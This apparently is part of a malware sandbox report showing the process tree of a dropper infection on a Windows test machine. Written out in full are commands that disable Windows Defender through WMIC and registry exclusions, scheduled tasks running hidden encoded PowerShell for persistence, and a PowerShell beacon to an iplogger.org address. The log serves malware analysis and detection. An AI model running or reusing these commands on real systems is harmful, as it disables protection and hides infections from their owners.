                                                                                                                                                                        • C:\Users\Admin\Documents\GSiHGbTWZEfjX3cdU5cr5BvX.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\GSiHGbTWZEfjX3cdU5cr5BvX.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                          PID:5496
                                                                                                                                                                          • C:\Users\Admin\Documents\GSiHGbTWZEfjX3cdU5cr5BvX.exe
                                                                                                                                                                            C:\Users\Admin\Documents\GSiHGbTWZEfjX3cdU5cr5BvX.exe
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:6324
                                                                                                                                                                            • C:\Users\Admin\Documents\GSiHGbTWZEfjX3cdU5cr5BvX.exe
                                                                                                                                                                              C:\Users\Admin\Documents\GSiHGbTWZEfjX3cdU5cr5BvX.exe
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:6908
                                                                                                                                                                            • C:\Users\Admin\Documents\faH_ialDRPCnct2J7TWwTzXZ.exe
                                                                                                                                                                              "C:\Users\Admin\Documents\faH_ialDRPCnct2J7TWwTzXZ.exe"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:5776
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 236
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Program crash
                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                  PID:6196
                                                                                                                                                                              • C:\Users\Admin\Documents\sEdPMr0qmsZuPRyCKhe5AVmh.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\sEdPMr0qmsZuPRyCKhe5AVmh.exe"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:5872
                                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                                                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:5324
                                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                    PID:4036
                                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\inst001.exe
                                                                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1068
                                                                                                                                                                                  • C:\Users\Admin\Documents\Wez0H9ElqNQePd622pu5hzeR.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\Wez0H9ElqNQePd622pu5hzeR.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:5992
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5992 -s 240
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                      PID:5416
                                                                                                                                                                                  • C:\Users\Admin\Documents\8ncTP6B1sNRxEZcEYW_cAoPa.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\8ncTP6B1sNRxEZcEYW_cAoPa.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:832
                                                                                                                                                                                  • C:\Users\Admin\Documents\T7wvKeQ3ba2OAuIacKcvoqNu.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\T7wvKeQ3ba2OAuIacKcvoqNu.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                    PID:3948
                                                                                                                                                                                  • C:\Users\Admin\Documents\DnunCa5WopHEi9g07xcvLo0c.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\DnunCa5WopHEi9g07xcvLo0c.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:3824
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3824 -s 280
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                      PID:6808
                                                                                                                                                                                  • C:\Users\Admin\Documents\fwgvst4sHJ2QNgeVywDkmnTm.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\fwgvst4sHJ2QNgeVywDkmnTm.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                    PID:5876
                                                                                                                                                                                  • C:\Users\Admin\Documents\zmrshzX3zQglyRDWXdvmaAm2.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\zmrshzX3zQglyRDWXdvmaAm2.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                    PID:4812
                                                                                                                                                                                  • C:\Users\Admin\Documents\tl7lal6oxEZHwfX9e_WBPRzl.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\tl7lal6oxEZHwfX9e_WBPRzl.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:4892
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 240
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                      PID:6832
                                                                                                                                                                                  • C:\Users\Admin\Documents\reVSfQSStmWPFzt4sDXrtyKZ.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\reVSfQSStmWPFzt4sDXrtyKZ.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:812
                                                                                                                                                                                  • C:\Users\Admin\Documents\3Xz1tJQZhQ7qnjjHq89vGFEd.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\3Xz1tJQZhQ7qnjjHq89vGFEd.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:5048
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:2348
                                                                                                                                                                                    • C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:2520
                                                                                                                                                                                        • C:\Users\Admin\Documents\7rWY9753VkOag507NoB9novN.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\7rWY9753VkOag507NoB9novN.exe"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:5504
                                                                                                                                                                                          • C:\Users\Admin\Documents\QZPP9NYVwKfVxQxBSIhwUy1e.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\QZPP9NYVwKfVxQxBSIhwUy1e.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:4656
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 256
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                PID:5288
                                                                                                                                                                                            • C:\Users\Admin\Documents\moJ1xsiA_1ggpmCvyqCIWeiO.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\moJ1xsiA_1ggpmCvyqCIWeiO.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:5376
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS63B1.tmp\Install.exe
                                                                                                                                                                                                  .\Install.exe
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:3432
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS66BF.tmp\Install.exe
                                                                                                                                                                                                      .\Install.exe /S /site_id "668658"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                      PID:2676
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                          PID:7068
                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:6068
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                  PID:5844
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                      PID:6368
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                          PID:1540
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                    PID:3856
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                        PID:2420
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                            PID:6940
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                PID:6664
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                            PID:5840
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                PID:480
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                    PID:5644
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                        PID:6924
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:6272
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                        PID:3068
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                            PID:3936
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                PID:7080
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                          PID:5656
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                              PID:5056
                                                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                  PID:5544
                                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                    PID:920
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                  PID:6884
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                      PID:2208
                                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                          PID:4324
                                                                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                            PID:6856
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                        schtasks /CREATE /TN "gOeGyhgrE" /SC once /ST 00:40:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                        PID:1452
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                        schtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 01:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\CbBefzn.exe\" W8 /site_id 668658 /S" /V1 /F
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                        PID:3924
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                PID:2164
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\3ZVrJ5td9P6bJYUIFnqO2CeD.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\3ZVrJ5td9P6bJYUIFnqO2CeD.exe"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:4704
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  "cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:784
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\wwl.exe
                                                                                                                                                                                                                                                      "wwl.exe"
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:6388
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\wwi.exe
                                                                                                                                                                                                                                                        "wwi.exe"
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                        PID:6268
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\svss.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\svss.exe"
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:6964
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sss.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\sss.exe"
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                            PID:1160
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\f.exe
                                                                                                                                                                                                                                                          "f.exe"
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:6204
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                                            PID:6452
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\S0iZmNCIuPzS02QdvHnGjiYK.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\S0iZmNCIuPzS02QdvHnGjiYK.exe"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                        PID:4896
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\lCyZK9Rvu7L42RPOdmb6VpjB.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\lCyZK9Rvu7L42RPOdmb6VpjB.exe"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:5944
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\8287383.scr
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\8287383.scr" /S
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:5612
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\2696486.scr
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\2696486.scr" /S
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                            PID:5232
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1004182.scr
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\1004182.scr" /S
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                            PID:6204
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4820 -ip 4820
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                        PID:5744
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4164 -ip 4164
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                        PID:5884
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4824 -ip 4824
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                        PID:5936
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4128 -ip 4128
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:6004
                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          PID:5516
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            PID:5760
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5760 -s 452
